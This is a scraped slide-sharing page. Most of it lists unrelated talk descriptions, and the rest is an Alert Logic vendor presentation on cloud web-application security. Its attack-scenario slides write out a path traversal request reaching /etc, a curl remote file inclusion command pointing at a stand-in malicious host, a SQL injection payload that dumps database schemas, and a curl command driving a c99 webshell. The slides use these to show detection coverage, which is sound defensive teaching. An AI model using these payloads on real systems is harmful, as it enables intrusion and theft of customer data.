This document discusses security in the cloud and describes Alert Logic's approach to cloud security. It provides an example attack scenario on a classic 3-tier web application and assesses Alert Logic's capabilities in detecting each step of the attack. These include reconnaissance, entry/data exfiltration, command and control, and establishing a persistent foothold. The document outlines how Alert Logic provides asset visibility, network inspection, deep HTTP inspection, and integrated security experts to provide deep threat visibility and coverage across the infrastructure.
Web App Security Presentation by Ryan Holland - 05-31-2017TriNimbus
Web App Security - A presentation by Ryan Holland, Sr. Director, Cloud Architecture at Alert Logic for the Vancouver AWS User Group Meetup on May 31, 2017.
#ALSummit: Live Cyber Hack DemonstrationAlert Logic
James Brown (VP Technology Solutions Group, Alert Logic), Stephen Coty (Chief Security Evangelist, Alert Logic), and Paul Fletcher (Security Evangelist, Alert Logic)'s live hack demonstration at the NYC Alert Logic Cloud Security Summit on June 14, 2016.
In this workshop, we’ll interactively demonstrate lightweight threat modeling techniques to elicit and qualify risks against a typical CDN-fronted web application. We’ll then perform attacks against an example web application and demonstrate how the Fastly edge cloud can mitigate security risks.
Web App Security Presentation by Ryan Holland - 05-31-2017TriNimbus
Web App Security - A presentation by Ryan Holland, Sr. Director, Cloud Architecture at Alert Logic for the Vancouver AWS User Group Meetup on May 31, 2017.
#ALSummit: Live Cyber Hack DemonstrationAlert Logic
James Brown (VP Technology Solutions Group, Alert Logic), Stephen Coty (Chief Security Evangelist, Alert Logic), and Paul Fletcher (Security Evangelist, Alert Logic)'s live hack demonstration at the NYC Alert Logic Cloud Security Summit on June 14, 2016.
In this workshop, we’ll interactively demonstrate lightweight threat modeling techniques to elicit and qualify risks against a typical CDN-fronted web application. We’ll then perform attacks against an example web application and demonstrate how the Fastly edge cloud can mitigate security risks.
RIoT (Raiding Internet of Things) by Jacob HolcombPriyanka Aash
The recorded version of 'Best Of The World Webcast Series' [Webinar] where Jacob Holcomb speaks on 'RIoT (Raiding Internet of Things)' is available on CISOPlatform.
Best Of The World Webcast Series are webinars where breakthrough/original security researchers showcase their study, to offer the CISO/security experts the best insights in information security.
For more signup(it's free): www.cisoplatform.com
Eric Golpe. Security, privacy, and compliance concerns can be significant hurdles to cloud adoption. Azure can help customers move to the cloud with confidence by providing a trusted foundation, demonstrating compliance with security standards, and making strong commitments to safeguard the privacy of customer data. This presentation will educate you in the fundamentals of Azure security as they pertain to the Cortana Analytics Suite, including capabilities in place for threat defense, network security, access control, and data protection as well as data privacy and compliance. Go to https://channel9.msdn.com/ to find the recording of this session.
The Offensive Cyber Security Certification will upgrade your skills to become a pentester, exploit developer. You will learn multiple offensive approaches to access infrastructure, environment, and information, performing risk analysis and mitigation, compliance, and much more with this program.
https://www.infosectrain.com/courses/offensive-cyber-security-engineer-training/
The Offensive Cyber Security Certification will upgrade your skills to become a pentester, exploit developer. You will learn multiple offensive approaches to access infrastructure, environment, and information, performing risk analysis and mitigation, compliance, and much more with this program.
The Offensive Cyber Security Certification will upgrade your skills to become a pentester, exploit developer. You will learn multiple offensive approaches to access infrastructure, environment, and information, performing risk analysis and mitigation, compliance, and much more with this program.
https://www.infosectrain.com/courses/offensive-cyber-security-engineer-training/
A Hacker's Perspective on Embedded Device Security, presented by Paul Dant of Independent Security Evaluators at the Security of Things Forum, Sept. 10, 2015
This presentation will introduce the Lockheed Martin Cyber Kill Chain and MITRE ATT&CK frameworks. By working through 4 different practical scenarios in a fictional company https://sensenet-library.com, the attendees will learn how they can use those frameworks to measure their security response in today's diverse security threat landscape. We'll go through categorising security controls, responding to a vulnerability report, assessing a threat intel report and decide on future of the company's toolset where you will be able to answer a question if you should continue investing in a tool or should you buy a new one.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Ramesh Iyer
In today's fast-changing business world, Companies that adapt and embrace new ideas often need help to keep up with the competition. However, fostering a culture of innovation takes much work. It takes vision, leadership and willingness to take risks in the right proportion. Sachin Dev Duggal, co-founder of Builder.ai, has perfected the art of this balance, creating a company culture where creativity and growth are nurtured at each stage.
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
Connector Corner: Automate dynamic content and events by pushing a buttonDianaGray10
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
Neuro-symbolic is not enough, we need neuro-*semantic*Frank van Harmelen
Neuro-symbolic (NeSy) AI is on the rise. However, simply machine learning on just any symbolic structure is not sufficient to really harvest the gains of NeSy. These will only be gained when the symbolic structures have an actual semantics. I give an operational definition of semantics as “predictable inference”.
All of this illustrated with link prediction over knowledge graphs, but the argument is general.
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
6. Tame the Beast
Industry Challenge: The Good, the Bad and the Ugly
Known Good
Known Bad
Suspicious
Allow
Identify | Tune | Permit
Block
Drop | Reconfigure
Application Stack
Web Apps
Server-side Apps
App Frameworks
Dev Platforms
Databases
Server OS
Hypervisor
Hardware Classification Action
HUMAN EXPERT
REQUIRED
7. Classic 3-Tier Web Application Key Target Assets
Key target assets for attack
Across the Full Stack
1. Custom application
2. Web server implementation
Apache, IIS, NGINGX
3. Application server implementation
Tomcat, Jboss, Jetty, ASP
4. Web server frameworks and
languages
Struts, PHP, Java
5. Databases
mySql, Oracle, MSSQL,..
6. AWS services
IAM, EC2, S3
EC2 instances
EC2 instances
VPC
Route 53
Users Internet
gateway
ELB
DB instance
DB instance
AvailabilityzoneAAvailabilityzoneB
Auto scaling
group
Web App Server
Auto scaling
group
S3
EC2 instances
EC2 instances
8. An attack scenario - Recon
VPC
Route 53
Internet
gateway
ELB
mySQL instance
On linux
AvailabilityzoneAAvailabilityzoneB
S3
Bastion
Host
PHP
Application
On Linux
1 – Performs low-frequency app-scan
2 – Tests path traversal and enumerates directories
3 – Tests remote file inclusion
Recon
Recon
• low slow application level scan
• Attacker learns PHP app, on linux, likely
mySql DB
• Suspects vulnerabilities
• tests potential path traversal vulnerability
/bWAPP/directory_traversal_2.php?directory=..
/../../../etc
• Path traversal is successful. Attacker
enumerates server directories.
• tests remote file inclusion vulnerability
Curl -X POST -F 'url=http [://] malicious
[dot] com/test.php' http [://] mysite [dot]
com/wp-content/plugins/site-
import/admin/page.php>
Attacker learnings: vulnerable PHP/mySql app,
prone to both smash’n grab attacks as more
persistent attack approaches
9. Entry and data exfiltration
• Attacker launches a series of SQL-I injection discovery
attempts
• Gets a dump-in-one-shot attack and gets full table return
http://victim.com/report.php?id=23 and(select (@a) from
(select(@a:=0x00),(select (@a) from (information_schema.schemata)where
(@a)in (@a:=concat(@a,schema_name,'<br>'))))a)
Attacker achievements: obtained sensitive customer-data without need for local
process or system breaches on servers
An attack scenario – opportunistic exfiltration
VPC
Route 53
Internet
gateway
ELB
mySQL instance
On linux
AvailabilityzoneAAvailabilityzoneB
S3
Bastion
Host
PHP
Application
On Linux
4 - SQL-I data extraction attack
Recon
• low slow application level scan
• Attacker learns PHP app, on linux, likely mySql DB
• Suspects vulnerabilities
• tests potential path traversal vulnerability
/bWAPP/directory_traversal_2.php?directory=../../../../etc
• Path traversal is successful. Attacker enumerates server directories.
• tests remote file inclusion vulnerability
Curl -X POST -F 'url=http [://] malicious [dot] com/test.php' http
[://] mysite [dot] com/wp-content/plugins/site-import/admin/page.php>
Attacker learnings: vulnerable PHP/mySql app, prone to both smasn’n grab attacks
as more persistent attack approaches
Entry/Exfil
10. VPC
Route 53
Internet
gateway
ELB
mySQL instance
On linux
AvailabilityzoneAAvailabilityzoneB
S3
Bastion
Host
PHP
Application
On Linux
5 - Webshell injection
6 - Commanding through Shell
Command and control (C&C)
• Attacker uploads c99 webshell via RFI vulnerability
• Persistent foothold for lateral movement established
curl -X POST -F 'act=search' -F 'grep=' -F 'fullhexdump=' -F 'base64='
-F 'nixpasswd=' -F 'pid=' -F 'c=' -F 'white=' -F 'sig=' -F
'processes_sort=' -F 'd=/var/www/' -F 'sort=' -F 'f=' -F 'ft=' http
[://] mysite [dot] com/path/to/c99
Attacker achievements: obtained foothold for further action and lateral
movement
Entry and data exfiltration
• Attacker launches a series of SQL-I injection attempts
• Gets a dump-in-one-shot attack and gets full table return
Attacker achievements: obtained sensitive customer-data without need for local
process or system breaches on servers
Recon
• low slow application level scan
• Attacker learns PHP app, on linux, likely mySql DB
• Suspects vulnerabilities
• tests potential path traversal vulnerability
/bWAPP/directory_traversal_2.php?directory=../../../../etc
• Path traversal is successful. Attacker enumerates server directories.
• tests remote file inclusion vulnerability (RFI)
Attacker learnings: vulnerable PHP/mySql app, prone to both smasn’n grab attacks
as more persistent attack approaches
An attack scenario – persistent foothold
Command and control
11. Deep
Application
threat visibility
Network inspection
Expert
SOC
Analysis of
Findings
Network,
system,
application
infrastructure
threat visibility
Alert Logic’s Approach
Cloudtrail
Config&VulnAssessment Foundation
Asset and
exposure
visibility
Log Collection
HTTP Inspection
Expert
Curation,
R&D of
Content and
Intel
Analytics
and
Machine
Learning
Content
and
Intel
Application
level Web
Attacks
OWASP Top
10
Attacks against
vulnerable
platforms and
libraries
Attacks against
miscon-
figurations
12. Coverage needed for this scenario
Low
slow
scan
Path
traver
sal
RFI SQLi
Web
shell
Recon
Entry
Exfil
C&C
Cloudtrail
Overall combined
coverage scorecard
No coverage
Vulnerability coverage only
Basic Threat Coverage
Deep threat coverage
How much can we see?
13. Coverage needed for this scenario
Foundation
Asset and
exposure
visibility
Low
slow
scan
Path
traver
sal
RFI SQLi
Web
shell
Config and vulnerability
assessment will reveal
vulnerabilities present
that attackers can exploit.
Actual attacks in motion
can not be detected with
vuln and config scanning
Recon
Entry
Exfil
C&C
Cloudtrail
Config&VulnAssessment
Overall combined
coverage
No coverage
Vulnerability coverage only
Basic Threat Coverage
Deep threat coverage
14. Network,
system,
application
infrastructure
threat visibility
Coverage needed for this scenario
Foundation
Asset and
exposure
visibility
Low
slow
scan
Path
traver
sal
RFI SQLi
Web
shell
Config and vulnerability
assessment will reveal
vulnerabilities present
that attackers can exploit.
Actual attacks in motion
can not be detected with
vuln and config scanning
Network inspection
providers visibility on
attacker actions on the
known vulnerabilities
exploited in the attack
and their success
Recon
Entry
Exfil
C&C
Network inspection
Cloudtrail
Config&VulnAssessment
Overall combined
coverage
No coverage
Vulnerability coverage only
Basic Threat Coverage
Deep threat coverage
15. Deep
Application
threat visibility
Network,
system,
application
infrastructure
threat visibility
Coverage needed for this scenario
Foundation
Asset and
exposure
visibility
Low
slow
scan
Path
traver
sal
RFI SQLi
Web
shell
Config and vulnerability
assessment will reveal
vulnerabilities present
that attackers can exploit.
Actual attacks in motion
can not be detected with
vuln and config scanning
Network inspection
providers visibility on
attacker actions on the
known vulnerabilities
exploited in the attack
and their success
Deep HTTP inspection
on requests and
responses, learning and
anomaly detection
deepens coverage for
whole classes of
application attacks
Recon
Entry
Exfil
C&C
Network inspection
Cloudtrail
Config&VulnAssessment
Log Collection
HTTP
Inspection
Overall combined
coverage
No coverage
Vulnerability coverage only
Basic Threat Coverage
Deep threat coverage
16. SECURITY
EXPERTS
Integrated Security Model
Incident
Investigation
System
Visual | Context | Hunt
Data & Event
Sources
Assets | Config | Logs
Automatic
Detection
Block | Alert | Log
ML Algorithms
Rules & Analytics
Security
Researchers
Data
Scientists
Software
Programmers
Integrated: Infrastructure | Content | Human Experts
Security
Analysts
17. We designed security for cloud and hybrid environments
GET STARTED IN MINUTES
MAINTAIN COVERAGE AT
CLOUD SCALE
KEEP PRODUCTION FLOWING
with modular services that
grow with you
Comply
with integration to cloud APIs
and DevOps automation
with auto-scaling support and
out-of-band detection
Single pane of glass for workload and application security
across cloud, hosted & on-premises
18. Leaders
28
8
6
4
10
25
3
5
5
11
8
10
15
24
Other
Amazon
Check Point
Chronicle Data
Cisco
Fortinet
Intel Security
Okta
Symantec
Barricade
JumpCloud
Evident.io
Palerra
Microsoft
CloudPassage
CloudCheckr
FortyCloud
ThreatStack
Alert Logic
A recognized security leader
“Alert Logic has a
head start in the cloud,
and it shows.”
PETER STEPHENSON
SC Magazine review
“…the depth and breadth
of the offering’s analytics
and threat management
process goes beyond
anything we’ve seen…”Who is your primary
in-use vendor for Cloud
Infrastructure Security?
Who are the top vendors
in consideration for Cloud
Infrastructure Security?
Alert Logic